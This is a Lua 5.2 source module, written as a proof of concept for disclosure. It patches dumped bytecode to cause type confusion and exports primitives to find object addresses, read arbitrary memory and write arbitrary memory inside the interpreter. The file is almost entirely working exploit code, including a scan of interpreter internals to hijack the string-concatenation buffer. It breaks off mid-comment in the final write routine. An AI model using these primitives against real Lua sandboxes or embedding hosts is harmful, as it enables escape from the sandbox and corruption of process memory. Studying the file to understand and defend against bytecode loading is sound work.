-- Copyright (c) 2010 Peter Cawley -- -- Permission is hereby granted, free of charge, to any person obtaining a copy of this -- software and associated documentation files (the "Software"), to deal in the Software -- without restriction, including without limitation the rights to use, copy, modify, -- merge, publish, distribute, sublicense, and/or sell copies of the Software, and to -- permit persons to whom the Software is furnished to do so, subject to the following -- conditions: -- -- The above copyright notice and this permission notice shall be included in all copies -- or substantial portions of the Software. -- -- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, -- INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A -- PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT -- HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF -- CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE -- OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -- Name: Bytecode abuse module for Lua 5.2 -- Purpose: Provide a practical example (rather than theoretical examples) of why -- loading untrusted bytecode in Lua 5.2 is a serious security concern. -- Contact: corsix@corsix.org -- License: See top of file. -- Version: 0.1 -- History: 21-Aug-2010 :: Version 0.1 -- * Initial Release -- Exported functions: -- address = address_of(gc_object) -- buffer = make_buffer(size, initial_contents) -- address = pointer_add(address1, address2) -- address = pointer_subtract(address1, address2) -- val = read_tvalue(address) -- content = read_memory(address, size) -- write_tvalue(address, val) -- write_memory(address, content) -- content = pack_uint(num, size) -- num = unpack_int(content, offset) -- See each individual function for its full description. 
-- The following overview shows how the most important parts of this module all fit
-- together, along with where bytecode loading comes into the picture.
-- Read "A -> B" as "A is built on top of B".
--
--   write_memory   -> ptr2num, read_tvalue, read_memory, write_tvalue
--   read_tvalue    -> ptr2num, write_tvalue
--   read_memory    -> ptr2num, address_of, write_tvalue, with_userdata
--   write_tvalue   -> ptr2num, address_of, setlist_fn, make_buffer
--   make_buffer    -> with_userdata
--   address_of     -> tonum_fn (only needed for strings)
--   with_userdata  -> lowcaller_fn
--
--   tonum_fn, setlist_fn, lowcaller_fn -> load malicious bytecode
--   ptr2num                            -> load bytecode

-- Refuse to run anywhere other than the interpreter this module was written against.
assert(_VERSION == "Lua 5.2", "This module only works with Lua 5.2")
assert(not jit, "This module only works with the reference interpreter, not LuaJIT")

-- The module table into which all exported functions will be placed.
local _M = {}

-- Make local copies of all the globals which are used.
-- This allows stricter global-access checks within the module, and serves as a kind of
-- dependency list (though various string functions are also called via method calls on
-- string variables).
local string_dump, type, assert, string_char, table_unpack, tonumber, loadin, pcall =
      string.dump, type, assert, string.char, table.unpack, tonumber, loadin, pcall
local string_gsub, math_huge, pairs, collectgarbage, math_frexp, tostring, table_concat =
      string.gsub, math.huge, pairs, collectgarbage, math.frexp, tostring, table.concat
local coroutine_running, math_max =
      coroutine.running, math.max
do
-- Prevent all access to globals (reads or writes to globals will throw an error).
-- From here on, only the locals captured above (and string methods) are usable.
local _ENV = nil
-- Shared table handed to loadin() as the environment of the patched functions.
local t = {}

-- Perform some introspection to get the endianness, and sizes of important data types.
-- The values are read from fixed byte positions of the header of a dumped function.
local header = string_dump(function()end)
local endian = header:byte(7) == 1 and "little" or "big"
local sizeof_int = header:byte(8)
local sizeof_pointer = header:byte(9) -- Assumption: sizeof(size_t) == sizeof(void*)
local sizeof_instruction = header:byte(10)
local sizeof_number = header:byte(11)
local number_type = header:byte(12) == 1 and "int" or "float"

-- Assumption: The actual value part of a TValue is at least large enough to store
-- numbers and pointers. If this assumption is wrong, then something is very seriously
-- broken.
local tvalue_value_size = sizeof_number
if tvalue_value_size < sizeof_pointer then
  tvalue_value_size = sizeof_pointer
end
-- Assumption: An entire TValue structure is at most twice the size of the value
-- part of it. If this is not true, then insert a larger multiplier here.
-- (The multiplier is a constant factor, not the value size itself.)
local tvalue_size = tvalue_value_size * 2

-- Create lookup table for turning opcode names into numbers
-- Assumption: The opcode numbers start at 0 and follow the order specified in the
-- following table.
local opcode_map = {}
do
  local opcode_names = {"MOVE", "LOADK", "LOADBOOL", "LOADNIL", "GETUPVAL", "GETTABUP",
    "GETTABLE", "SETTABUP", "SETUPVAL", "SETTABLE", "NEWTABLE", "SELF", "ADD", "SUB",
    "MUL", "DIV", "MOD", "POW", "UNM", "NOT", "LEN", "CONCAT", "JMP", "EQ", "LT", "LE",
    "TEST", "TESTSET", "CALL", "TAILCALL", "RETURN", "FORLOOP", "FORPREP", "TFORCALL",
    "SETLIST", "CLOSE", "CLOSURE", "VARARG", "TFORLOOP", "EXTRAARG"}
  -- Opcode numbers are zero-based, whereas Lua arrays are one-based.
  for i = 1, #opcode_names do
    opcode_map[opcode_names[i]] = i - 1
  end
end

-- Helper function to create a string whose byte representation is a VM instruction
-- @param op The numeric opcode for the instruction (an integer in range [0, 39]), or
--           a string containing the name of the opcode (e.g. "GetTabUp"); names are
--           matched case-insensitively.
-- @param a The "A" parameter for the instruction (an integer in range [0, 255]).
-- @param b The "B" or "sBx" parameter for the instruction ("B" parameters are
--          integers in range [0, 511], sBx are in range [-131071, 131071]).
-- @param c The "C" parameter for the instruction, or the string "sBx" if the "B"
--          parameter is in fact "sBx" ("C" has same range as "B").
-- @return A string of sizeof_instruction bytes, in the native byte order.
-- @throw An error is thrown if "op" is a string which is not a known opcode name.
local function make_instruction(op, a, b, c)
  -- Assumption: Instructions are laid out in the order OP, A, C, B, with the width
  -- of the fields being (respectively) 6, 8, 9, and 9 bits.
  -- We could try to deduce the width of the fields by dumping a function with known
  -- bytecode representation, but if the instruction widths have changed, then other
  -- more drastic changes have probably also been made to instruction formats.
  if type(op) == "string" then
    op = assert(opcode_map[op:upper()], "Unrecognised opcode")
  end
  if c == "sBx" then
    -- Apply sBx bias to turn sBx into Bx
    b = b + (2^18-1)/2 - 0.5
    -- Split Bx into the B and C fields
    c = b % 2^9
    b = (b - c) / 2^9
  end
  -- Construct the values of the bytes of the instruction
  local low_a = a % 4
  local low_b = b % 2
  local low_c = c % 4
  --                                             bit0    bit7
  local b1 = op + low_a * 2^6                 -- [OPOPOP|AA]
  local b2 = ((a - low_a) / 4) + low_c * 2^6  -- [AAAAAA|CC]
  local b3 = ((c - low_c) / 4) + low_b * 2^7  -- [CCCCCCC|B]
  local b4 = ((b - low_b) / 2)                -- [BBBBBBBB]
  -- Pack the bytes into a string and pad them
  local inst
  if endian == "little" then
    inst = string_char(b1, b2, b3, b4)
    inst = inst .. ("\0"):rep(sizeof_instruction - #inst)
  else
    inst = string_char(b4, b3, b2, b1)
    inst = ("\0"):rep(sizeof_instruction - #inst) .. inst
  end
  return inst
end

-- Helper function to replace one instruction with another in the string
-- representation of a function.
-- @param haystack The result of a call to string.dump containing the string
--                 representation of a function.
-- @param needle An array containing the arguments for a call to make_instruction, the
--               result of which is the instruction to be replaced.
-- @param repl An array containing the arguments for a call to make_instruction, the
--             result of which is the instruction to replace "needle" with.
-- @return A string containing a representation of a function, which is the same as
--         "haystack", but with the 1st occurrence of "needle" replaced by "repl".
-- @throw An error is thrown if "needle" does not occur in "haystack" (for example
--        because the compiler generated different code to what was expected).
local function replace_instruction(haystack, needle, repl)
  needle = make_instruction(table_unpack(needle))
  repl   = make_instruction(table_unpack(repl  ))
  -- NB: Using gsub would require that we escape anything magic in needle and repl
  local idx = haystack:find(needle, 1, true)
  -- Fail loudly here rather than with "arithmetic on a nil value" on the next line.
  assert(idx, "Instruction to be replaced was not found in the dumped function")
  return haystack:sub(1, idx-1) .. repl .. haystack:sub(idx + sizeof_instruction, -1)
end

-- Construct a helper function which performs a SETLIST VM instruction.
-- The resulting function will perform tt[1] = k, and do so under the assumption that
-- tt is a table (NB: Lua 5.1 doesn't make this assumption).
-- If tt is not a table, then this leads to all sorts of fun. In particular, if tt is
-- a number, then the binary representation of the number is interpreted as a pointer
-- to a Table structure, and if tt is a different GC object, then the pointer to its
-- structure is treated as a pointer to a Table structure.
-- Provided that the "sizearray" field of the resulting Table structure is strictly
-- positive, then a TValue is written to the address specified in the "array" field of
-- the resulting Table.
-- @param tt A value to be interpreted as a table.
-- @param k A value to be written to tt[1].
local setlist_fn
-- NB: The body below is deliberately minimal; the patching step that follows searches
-- for one specific instruction in its compiled form, so do not restructure it.
setlist_fn = string_dump(function(tt, k)
  tt = {k}
  do return end
  t = nil -- 5.2-work4 bug workaround: loadin requires that there be an upvalue
end)
-- Replace "NEWTABLE 2 1 0" with "MOVE 2 0", so that the SETLIST operates on the "tt"
-- parameter rather than on a new table.
setlist_fn = replace_instruction(setlist_fn,
  {"NewTable", 2, 1, 0},
  {"Move"    , 2, 0, 0})
-- Load the patched bytecode; the assert surfaces any load failure immediately.
setlist_fn = assert(loadin(t, setlist_fn))

-- Construct a helper function which changes the type of a value to be a number,
-- without changing anything else in the value.
-- If we can subsequently dump the binary representation of the number, then this
-- provides us with a way of doing what lua_topointer does. In particular, this allows
-- us to obtain the addresses of strings, which is convenient, as we can construct
-- strings with whatever contents we want. Note that this bytecode abuse passes right
-- through 5.1's bytecode verifier, so this trick can also be used for information
-- leakage attacks using Lua 5.1.
-- @param a The value to be reinterpreted as a number.
-- @return A copy of the parameter, with the type-tag field changed to that of a
--         number, and everything else unchanged.
local tonum_fn
-- NB: The loop below is compiled and then patched; keep its shape exactly as it is.
tonum_fn = string_dump(function(a)
  for i = a, -math_huge, 0 do
    return i
  end
end)
-- Replace "FORPREP 1 1" with "JMP 1", so that the parameters are not validated as
-- numbers.
tonum_fn = replace_instruction(tonum_fn,
  {"ForPrep", 1, 1, "sBx"},
  {"Jmp"    , 0, 1, "sBx"})
tonum_fn = assert(loadin({math_huge = math_huge}, tonum_fn))

-- Helper function to return the in-memory binary representation of a number.
-- Normalised numbers, denormalised numbers, both zeros and both infinities are
-- supported.
-- @param n A number to return the in-memory binary representation of.
-- @return A string whose byte representation matches the byte representation of the
--         "n" parameter. Note that this may be longer than the length of a pointer.
-- @throw An error is thrown if the given number is NaN, or if the Lua number type is
--        not a double-precision float.
local function num2ptrx(n)
  -- Assumption: Lua number type is 64-bit (double-precision) IEEE754 floating point.
  -- We can check the actual number type by inspecting the bytecode header, but this
  -- is the most common number type, so it'll do for now.
  assert(number_type == "float" and sizeof_number == 8,
    "num2ptrx only implemented for double-precision floating point numbers")
  local top_bit = 0
  if 1/n == -math_huge -- reliable way of detecting negative zero
  or n < 0 then
    n = -n
    top_bit = 1
  end
  local bytes = {0, 0, 0, 0, 0, 0}
  if n == math_huge then
    -- Infinity is a special case.
    bytes[7] = 0xF0
    bytes[8] = 0x7F + top_bit * 0x80
  elseif n == 0 then
    -- Zero is another special case
    bytes[7] = 0x00
    bytes[8] = top_bit * 0x80
  else
    -- Bit patterns x11111111111xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    -- are all NaN values (with the exception of all the second group of bits being
    -- zero, which is infinity), which it is impossible to do anything with. We just
    -- have to hope that we do not hit these values.
    assert(n == n, "Unable to determine the binary representation of NaN values")
    local exponent_width = 11
    local mantissa_width = 52
    -- frexp gives n == m * 2^e with m in [0.5, 1).
    local m, e = math_frexp(n)
    -- Convert to the biased exponent of the 1.xxx * 2^E form used by IEEE754.
    e = e + 2^(exponent_width - 1) - 2
    if e <= 0 then
      -- Denormalised number: the exponent field is zero, there is no implicit
      -- leading one, and the mantissa field is n / 2^-1074. Expressed in terms of
      -- the biased exponent, that is m * 2^(e + mantissa_width), which is an exact
      -- integer below 2^mantissa_width.
      m = m * 2^(e + mantissa_width)
      e = 0
    else
      -- Normalised number: drop the implicit leading one and scale the remaining
      -- fraction up to an integer.
      m = (m - 0.5) * 2^(mantissa_width + 1)
    end
    -- The sign bit sits immediately above the exponent field.
    e = e + top_bit * 2^exponent_width
    for i = 1, 8 do
      bytes[i] = m % 256
      m = (m - bytes[i]) / 256
      if i == 2 then
        -- Having taken 16 bits of precision out of the mantissa, there is now room
        -- for inserting the exponent without losing any precision.
        m = m + e * 2^(mantissa_width - 16)
      end
    end
  end
  -- The bytes were produced least-significant first.
  local s = string_char(table_unpack(bytes))
  if endian == "big" then
    s = s:reverse()
  end
  return s
end

-- Helper function to perform a call to another function, but with the garbage
-- collector disabled for the duration of the call. This can be useful if the called
-- function places the Lua VM temporarily in a state where there are invalid values
-- around, as traversal of these by the GC could lead to problems.
-- @param f A function to be called with the garbage collector disabled.
-- @param ... Arguments to pass to "f".
-- @return The return value(s) of "f".
local without_gc do
  -- Receives the results of pcall: restarts the collector, then either passes the
  -- results through or re-raises the error.
  local function enable_gc(x, ...)
    collectgarbage "restart"
    if x then
      return ...
    else
      assert(x, ...)
    end
  end
  without_gc = function(f, ...)
    local is_running = collectgarbage "isrunning"
    if not is_running then
      -- Collector already stopped (e.g. nested call): leave its state alone.
      return f(...)
    else
      collectgarbage "stop"
      return enable_gc(pcall(f, ...))
    end
  end
end

-- Helper function to create a userdata with some initial contents, pass said userdata
-- to another function, and then return the final contents of said userdata.
-- @param size The minimum size (in bytes) of the userdata to pass to "f".
-- @param f A function (or other callable value), which will be called with a single
--          userdata parameter, whose size will be at least "size" bytes.
-- @param init A string whose contents will be present at the head of the userdata
--             when "f" is called.
-- @return A string representation of the contents of the userdata passed to "f",
--         after the call to "f" completed.
local with_userdata do
  -- Construct a helper function which allows us to call a function, and subsequently
  -- access its locals / stack slots (provided that said function calls us back, as
  -- obviously said function needs to be running for it to have locals).
  -- See http://article.gmane.org/gmane.comp.lang.lua.general/50879/ for the initial
  -- report of this bytecode abuse in Lua 5.1.4.
  -- @param g A function which will be called with a single parameter. This parameter,
  --          when called from within "f", will return the values of (some of the)
  --          locals / stack slots of "f".
  -- @param f A function to be called, whose locals / stack slots will be available for
  --          reading.
  -- @param x, y, z Parameters to be passed to "f".
  -- @return The first return value of the call to "f".
  local lowcaller_fn
  -- NB: The register numbers used by the patch below depend on the exact number and
  -- order of parameters and locals in this function; do not restructure it.
  lowcaller_fn = string_dump(function(g, f, x, y, z)
    do
      local l1, l2, l3, l4, l5, l6, l7, l8
      g(function() return l1, l2, l3, l4, l5, l6, l7, l8 end)
      f(x, y, z)
      return f
    end
    t = nil -- 5.2-work4 bug workaround: loadin requires that there be an upvalue
  end)
  -- Replace "CALL 13 4 1" with "CALL 1 4 2" so that the call to "f" happens at the
  -- bottom of the stack, causing l1 through l8 to be used as locals / stack slots for
  -- the call, and then causing the return value to overwrite f.
  lowcaller_fn = replace_instruction(lowcaller_fn,
    {"Call", 13, 4, 1},
    {"Call",  1, 4, 2})
  lowcaller_fn = assert(loadin(t, lowcaller_fn))

  -- Smallest size for which the buffer system hands out a userdata; determined
  -- lazily on the first call to with_userdata.
  local min_userdata_size
  with_userdata = function(size, f, init)
    init = init or ""
    -- The userdata which we end up creating is made by the auxiliary library buffer
    -- system. Unfortunately, this system only allocates userdatas after a certain
    -- size threshold, which we determine through an exponential search done in the
    -- first call to with_userdata.
    if not min_userdata_size then
      local found_ud = false
      local found_f = function() found_ud = true end
      min_userdata_size = 1
      repeat
        min_userdata_size = min_userdata_size * 2
        -- Recursive call; min_userdata_size is already set, so this does not recurse
        -- into the search again.
        with_userdata(min_userdata_size, found_f)
      until found_ud
    end
    if size < min_userdata_size then
      size = min_userdata_size
    end
    -- We use the size for string.rep, which (for large N) works faster if you call it
    -- multiple times with values which multiply together to the desired N. As we
    -- don't care if the size is larger than what we want, exact factorisation isn't
    -- needed, and we can just do the following.
    size = size - #init
    if size <= 0 then
      size = 0
    else
      size = size ^ 0.5 -- sqrt
      size = size - (size % 1) + 1 -- ceil
    end
    local read_locals
    -- string.gsub is run over "12" with pattern ".", so the replacement callback is
    -- invoked exactly twice: once with "1" and once with "2".
    return lowcaller_fn(function(...) read_locals = ... end,
      string_gsub, "12", ".", function(s)
      if s == "1" then
        -- First call: ensure that the userdata is large enough, and has the correct
        -- initial contents.
        return init .. ("\0"):rep(size):rep(size)
      else
        -- Second call: find the userdata, and pass it to f.
        for _, v in pairs{read_locals()} do
          if type(v) == "userdata" then
            f(v)
            break
          end
        end
        return ""
      end
    end)
  end
end

-- Helper function to take a string of bytes and return a number whose in-memory
-- representation is that string of bytes (obviously only possible when the length of
-- the string is less than or equal to the in-memory length of a number).
-- @param p A string of bytes to be converted. The length of this string cannot be
--          greater than the size of a number (typically 8 bytes, sometimes 4).
-- @return A number whose in-memory representation is the same as that of "p".
local ptr2num do
  -- Some number whose binary representation should only occur once in a dumped
  -- function.
  local magic_k = 31416
  -- Dump a function which returns the above constant, and identify where the constant
  -- is in the resulting string.
  local k_fn = string_dump(loadin(t, "return " .. magic_k))
  magic_k = num2ptrx(magic_k)
  -- NOTE(review): idx is nil if the constant is not found in the dump; that case is
  -- not checked here and would surface as an error inside ptr2num.
  local idx = k_fn:find(magic_k, 1, true)
  -- Perform the conversion which we want by replacing the constant with the value to
  -- be converted, then load and call the resulting code.
  ptr2num = function(p)
    -- Assumption: Generally whenever this is called, there is an assumption that
    -- sizeof(void*) <= sizeof(lua_Number)
    assert(type(p) == "string")
    assert(#p <= #magic_k, "Pointer too big to convert to number")
    -- NB: Don't use .. operator, as ptr2num can be called while the concatenation
    --     buffer is being abused for other things.
    -- The value is zero-padded on the right up to the size of a number.
    return loadin(t, table_concat{k_fn:sub(1, idx - 1), p,
      ("\0"):rep(#magic_k - #p), k_fn:sub(idx + #magic_k, -1)})()
  end
end

-- Create a mutable buffer with a given size and/or initial contents.
-- @param size The minimum size (in bytes) of the newly created userdata (optional).
--             If a string is passed here, it is used as "initial_contents" and its
--             length is used as the size.
-- @param initial_contents A string whose bytes will be present at the head of the
--                         resulting userdata (optional).
-- @return A newly created userdata.
function _M.make_buffer(size, initial_contents)
  local ud
  if type(size) == "string" then
    initial_contents = size
    size = #size
  end
  -- Capture the userdata which with_userdata passes to its callback.
  with_userdata(size or 0, function(...) ud = ... end, initial_contents)
  return ud
end

-- Often we know a memory address and want to write to it multiple times. This helper
-- function makes functions which write to a specific memory address.
-- @param address A string whose byte representation matches that of a native pointer.
-- @return A function, which when called with a single value, will write that value as
--         a TValue structure to the previously specified memory address.
local function make_tvalue_writer(address)
  -- To perform the write, we need to have a Table structure with suitable "array" and
  -- "sizearray" fields.
  -- Assumption: A Table structure is 8 pointers wide, with three of those pointers
  --             coming before the "array" pointer.
  -- Assumption: Signed integers are represented using two's complement and the
  --             character code for space doesn't have MSB set (hence a string of spaces,
  --             interpreted as an int, is strictly positive).
  -- NB: This local "t" shadows the module-level "t" within this function.
  local t = (" "):rep(sizeof_pointer * 3) .. address .. (" "):rep(sizeof_pointer * 4)
  -- We could use "t" as our table, but that would require that we get the address of
  -- the string. This can be done, but getting the address of a userdata is more
  -- reliable. In either case, the string or userdata cannot be used as the table
  -- directly, as then there would be an awkward header on the front of the data, and
  -- the "array" field of a Table would land within the header rather than within
  -- our data.
  local ud = _M.make_buffer(t)
  local addr = ptr2num(_M.address_of(ud))
  return function(val)
    -- Note that ud has to be kept alive, which we do by passing it as a parameter
    -- (which is subsequently ignored).
    setlist_fn(addr, val, ud)
  end
end

-- Write a Lua TValue structure at a given location.
-- @param address A string whose byte representation matches that of a native pointer
--                to the address to be written to.
-- @param val A Lua value which will be written, as a TValue structure, to the given
--            address.
function _M.write_tvalue(address, val)
  -- A fresh single-use writer is created for every call.
  make_tvalue_writer(address)(val)
end

-- Takes a userdata/table/function/thread and returns a string whose contents is a
-- native pointer to the object. Can also return the address of strings, but this is
-- not possible for all strings, and hence cannot be used reliably.
-- @param gc_object A garbage collectable object (userdata, thread, function, table,
--                  or string) to be converted into a pointer.
-- @return A string whose byte representation matches that of a pointer to the
--         specified object. For userdata, this is a pointer to the data of the
--         userdata. For other types, it is a pointer to an instance of Lua's internal
--         structure for the type.
function _M.address_of(gc_object)
  local typ = type(gc_object)
  if typ == "userdata" or typ == "table" or typ == "function" or typ == "thread" then
    -- Most garbage-collectable objects are simple, as tostring gives you the pointer.
    -- The only step required after that is to reformat the pointer as a string
    -- containing an array of bytes.
    -- The textual form of a pointer is platform dependent (it may or may not carry a
    -- "0x" prefix, and may or may not be zero-padded to full width), so take the run
    -- of hex digits at the end of the string and pad it to full width ourselves.
    local hex = tostring(gc_object):match("%x+$")
    assert(hex, "Unable to extract an address from the result of tostring")
    hex = (("0"):rep(sizeof_pointer * 2 - #hex) .. hex):sub(-sizeof_pointer * 2, -1)
    -- Each pair of hex digits becomes one byte (most significant byte first).
    local ptr = hex:gsub("..", function(x)
      return string_char(tonumber(x, 16))
    end)
    if endian == "little" then
      ptr = ptr:reverse()
    end
    return ptr
  else
    assert(typ == "string", "Only GC objects have addresses")
    -- Strings are the difficult case. Obviously tostring() will give us back the
    -- string itself, rather than the address of it. Hence we have to fall back to the
    -- much less reliable route of changing the type-tag field to that of a number,
    -- and then trying to determine the binary representation of the number, which can
    -- fail if the pointer to the string comes out as a NaN value when reinterpreted
    -- as a lua_Number.
    gc_object = tonum_fn(gc_object)
    return num2ptrx(gc_object):sub(1, sizeof_pointer)
  end
end

do
  -- Helper function to normalise pointer arguments.
  -- @param p A string whose byte representation is a native pointer, or a number to
  --          be used as an offset from (char*)NULL, or a GC object (other than a
  --          string) to take the address of, or nil for the NULL pointer.
  -- @return A string whose byte representation is a native pointer.
  -- @throw An error is thrown if "p" is NaN or infinite.
  local function checkptr(p)
    local typ = type(p)
    if typ == "number" then
      assert(p == p, "NaN cannot be used as a pointer")
      local negative = p < 0
      if negative then
        p = -p
      end
      -- An infinite value would never reach zero in the loop below.
      assert(p ~= math_huge, "Infinity cannot be used as a pointer")
      -- Split the magnitude into bytes, least significant first.
      local bytes = {}
      local i = 1
      while p ~= 0 do
        local byte = p % 256
        bytes[i] = byte
        p = (p - byte) / 256
        i = i + 1
      end
      -- Zero-extend to the width of a pointer.
      for j = i, sizeof_pointer do
        bytes[j] = 0
      end
      if negative then
        -- Assumption: Two's complement is used for representing negative numbers.
        -- Negate byte-wise (invert every byte, then add one) rather than adding
        -- 2^(8 * sizeof_pointer) to the number, as the latter loses precision when
        -- pointers are as wide as the mantissa of a lua_Number.
        local carry = 1
        for j = 1, #bytes do
          local v = 255 - bytes[j] + carry
          carry = v >= 256 and 1 or 0
          bytes[j] = v % 256
        end
      end
      p = string_char(table_unpack(bytes))
      if endian == "big" then
        p = p:reverse()
      end
      return p
    elseif typ == "nil" then
      return ("\0"):rep(sizeof_pointer)
    elseif typ ~= "string" then
      return _M.address_of(p)
    else
      return p
    end
  end

  -- Normalises a pointer argument and splits it into an array of byte values,
  -- least significant byte first.
  local function pointer_bytes(p)
    p = checkptr(p)
    if endian == "big" then
      p = p:reverse()
    end
    return {p:byte(1, -1)}
  end

  -- Inverse of pointer_bytes: packs an array of byte values (least significant byte
  -- first) into a string in the native byte order.
  local function bytes_to_pointer(bytes)
    local p = string_char(table_unpack(bytes))
    if endian == "big" then
      p = p:reverse()
    end
    return p
  end

  -- Takes two pointers and returns their sum.
  -- @param p1 A pointer. This should be either a number representing an address, or a
  --           string whose byte representation is a native pointer.
  -- @param p2 As "p1".
  -- @return A string whose byte representation is the sum of "p1" and "p2". The
  --         result has the same width as "p1"; a carry out of the most significant
  --         byte is discarded (i.e. the addition wraps around).
  function _M.pointer_add(p1, p2)
    local bytes1 = pointer_bytes(p1)
    local bytes2 = pointer_bytes(p2)
    local carry = 0
    for i = 1, #bytes1 do
      local sum = bytes1[i] + (bytes2[i] or 0) + carry
      carry = sum >= 256 and 1 or 0
      bytes1[i] = sum % 256
    end
    return bytes_to_pointer(bytes1)
  end

  -- Takes two pointers and returns the pointer obtained by subtracting the second
  -- from the first.
  -- @param p1 A pointer. This should be either a number representing an address, or a
  --           string whose byte representation is a native pointer.
  -- @param p2 As "p1".
  -- @return A string whose byte representation is "p1" minus "p2". The result has
  --         the same width as "p1"; a borrow out of the most significant byte is
  --         discarded (i.e. the subtraction wraps around).
  function _M.pointer_subtract(p1, p2)
    local bytes1 = pointer_bytes(p1)
    local bytes2 = pointer_bytes(p2)
    local borrow = 0
    for i = 1, #bytes1 do
      local diff = bytes1[i] - (bytes2[i] or 0) - borrow
      borrow = diff < 0 and 1 or 0
      bytes1[i] = diff % 256
    end
    return bytes_to_pointer(bytes1)
  end
end

do
  -- For read operations, we need a table with at least one array slot. Unfortunately,
  -- this table will never get freed, as we corrupt it too much, and hence have to
  -- remove it from the garbage collector's control.
  local read_mem_t = {0}
  -- Change the type field of the newly created table so that the garbage collector
  -- sees it as nil. Note that the reference that we have to the table still thinks
  -- that it is a table, so we can still read from it.
  local read_mem_type = _M.pointer_add(_M.address_of(read_mem_t), sizeof_pointer)
  _M.write_tvalue(read_mem_type, ptr2num(("\0"):rep(sizeof_number)))
  -- Writer for the "array" field of the table (three pointers into the structure).
  local set_read_mem_target = make_tvalue_writer(_M.pointer_add(read_mem_type,
    sizeof_pointer * 2))

  -- Read an arbitrary block of memory in the address space of the Lua state.
  -- @param address The address in memory at which to start reading. This should be
  --                either a number representing an address, or a string whose
  --                byte representation is a native pointer.
  -- @param size The number of bytes to read. Note that up to sizeof(TValue) more
  --             bytes may be read.
  -- @return A string whose contents is byte-for-byte identical to the contents of the
  --         memory range [address, address+size).
  function _M.read_memory(address, size)
    return without_gc(with_userdata, size + tvalue_size, function(ud)
      local ud_addr = _M.address_of(ud)
      -- Copy one TValue's worth of value bytes per iteration into the userdata.
      for i = 0, size - 1, tvalue_value_size do
        set_read_mem_target(ptr2num(_M.pointer_add(address, i)))
        local val = read_mem_t[1]
        val = nil -- Clears the type-tag field, leaves value intact. This makes the
                  -- value safe for calls like luaC_barrierback.
        _M.write_tvalue(_M.pointer_add(ud_addr, i), val)
      end
    end):sub(1, size)
  end

  -- Read a single Lua value in the address space of the Lua state.
  -- @param address The address in memory at which to read a Lua TValue structure.
  -- @return The value present at the given address. If this is not a valid Lua value,
  --         then operations on it will likely fail, and the GC will likely explode if
  --         it tries to do anything with it.
  function _M.read_tvalue(address)
    set_read_mem_target(ptr2num(address))
    return read_mem_t[1]
  end
end

-- Convert an integer which is stored in native machine format as bytes in a string
-- into a number.
-- @param str A string whose byte sequence contains an integer in native machine
--            format.
-- @param offset (Optional) The byte offset within str at which to start reading the
--               integer. Defaults to 0 if not given.
-- @return The signed value of the sizeof(int) bytes found at the given offset.
-- @throw An error is thrown if fewer than sizeof(int) bytes are available at the
--        given offset.
function _M.unpack_int(str, offset)
  offset = offset or 0
  str = str:sub(offset + 1, offset + sizeof_int)
  -- Fail with a clear message instead of "arithmetic on a nil value" in the loop.
  assert(#str == sizeof_int, "Not enough bytes available to unpack an int")
  if endian == "big" then
    str = str:reverse()
  end
  local bytes = {str:byte(1, -1)}
  local n = 0
  local mul = 1
  for i = 1, sizeof_int do
    n = n + mul * bytes[i]
    mul = mul * 256
  end
  -- Values with the top bit set are negative (two's complement).
  if n >= (mul / 2) then
    n = n - mul
  end
  return n
end

-- Convert a number which is a non-negative integer into a string whose byte
-- representation is the given integer in the native machine format.
-- @param num A number which is non-negative and has no fractional part.
-- @param size (Optional) The number of bytes to return. Defaults to sizeof(int).
-- @return A string whose byte representation is "num", in the native machine format
--         for integers.
function _M.pack_uint(num, size)
  size = size or sizeof_int
  local bytes = {}
  for i = 1, size do
    local byte = num % 256
    bytes[i] = byte
    num = (num - byte) / 256
  end
  local s = string_char(table_unpack(bytes))
  if endian == "big" then
    s = s:reverse()
  end
  return s
end

do
  -- Assumption: a lua_State has a pointer to a global_State, and there are three
  --             pointer-sized fields in a lua_State prior to this pointer.
  local global_state_addr = _M.read_memory(_M.pointer_add(_M.address_of(
    coroutine_running()), sizeof_pointer * 3), sizeof_pointer)
  local concat_mbuff_addr_buffer
  local concat_mbuff_addr_n
  local concat_mbuff_addr_buffsize
  without_gc(function()
    -- Assumption: global_State stores the value of the GC pause parameter as an
    --             integer field.
    -- Find the pause field by setting it to a known value and scanning for it.
    local new_pause = 42
    local old_pause = collectgarbage("setpause", new_pause)
    local pause_addr = global_state_addr
    while true do
      if _M.unpack_int(_M.read_memory(pause_addr, sizeof_int)) == new_pause then
        -- Check that we really have found the field by changing it and ensuring that
        -- the pointer we have also changes. This is done a few times.
        local is_good = true
        for i = 1, 5 do
          new_pause = new_pause * 11
          collectgarbage("setpause", new_pause)
          if _M.unpack_int(_M.read_memory(pause_addr, sizeof_int)) ~= new_pause then
            is_good = false
            break
          end
        end
        if is_good then
          break
        end
      end
      pause_addr = _M.pointer_add(pause_addr, sizeof_int)
    end
    collectgarbage("setpause", old_pause)
    -- Assumption: Immediately prior to the pause field is an Mbuffer structure used
    --             during string concatenations.
    concat_mbuff_addr_buffer = _M.pointer_subtract(pause_addr, sizeof_pointer * 3)
    concat_mbuff_addr_n = _M.pointer_add(concat_mbuff_addr_buffer, sizeof_pointer)
    concat_mbuff_addr_buffsize = _M.pointer_add(concat_mbuff_addr_n, sizeof_pointer)
  end)
  -- Writers are created up front, so that no allocation or concatenation is needed
  -- while the Mbuffer fields are in an altered state.
  local concat_mbuff_set_buffer = make_tvalue_writer(concat_mbuff_addr_buffer)
  local concat_mbuff_set_n = make_tvalue_writer(concat_mbuff_addr_n)
  local concat_mbuff_set_buffsize = make_tvalue_writer(concat_mbuff_addr_buffsize)

  -- Performs the actual write; intended to be run with the garbage collector stopped.
  -- @param address The destination, already converted to a number by ptr2num.
  -- @param content The string of bytes to be written (at least two bytes long).
  -- @param buffsize The length of "content", already converted by ptr2num.
  local function do_write_memory(address, content, buffsize)
    -- Throughout this function, we have to take care not to call luaV_concat,
    -- except calling it once to perform the intended memory write. This means
    -- avoiding any explicit concatenations, and avoiding other functions which can
    -- end up calling luaV_concat, like for example address_of.

    -- As we'll be overwriting the Mbuffer fields, we need to save them so that they
